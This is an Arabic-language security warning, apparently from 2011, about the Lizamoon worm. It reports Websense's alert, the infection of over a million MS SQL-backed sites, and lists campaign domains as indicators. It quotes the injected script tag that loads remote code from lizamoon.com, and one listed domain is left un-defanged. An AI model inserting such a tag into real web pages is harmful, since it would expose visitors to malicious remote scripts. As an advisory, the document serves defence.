تحذير من دودة Lizamoon

اصدرت شركة Websense تحذيراً من دودة Lizamoon والتي بدأت بالانتشار بشكل متسارع حيث تقوم باستغلال ثغرة لحقن كود في المواقع يشير الى موقع lizamoon.com والذي سمّيت الدودة باسمه.

الكود الذي يحقن في المواقع هو

<script src=hxxp://lizamoon.com/ur.php></script>

يمكن الاطلاع على عدد المواقع المحقونة باستخدام غوغل

مثال على موقع مصاب

تحديث (٣-٤-٢٠١١): ارتفع عدد المواقع المصابة إلى أكثر من مليون موقع مما يجعل هذه الدودة من اكثر المتسببين في اصابات مواقع إن لم تكن أكثرهم. المواقع المصابة تستخدم MS SQL 2000 أو MS SQL 2005.

صحيح أن الدودة بدأت بحقن المواقع بكود يؤشر الى موقع lizamoon إلا أنّ  هذا النّطاق هو أحد النّطاقات التي تستخدمه الدودة وليس الوحيد. هنا قائمة أوّليّة بالمواقع الأخرى:

hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats48.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://system-stats.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://stats-master11.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://social-stats.info/ur.php
hxxp://extra-service.info/ur.php
http://sol-stats.info/ur.php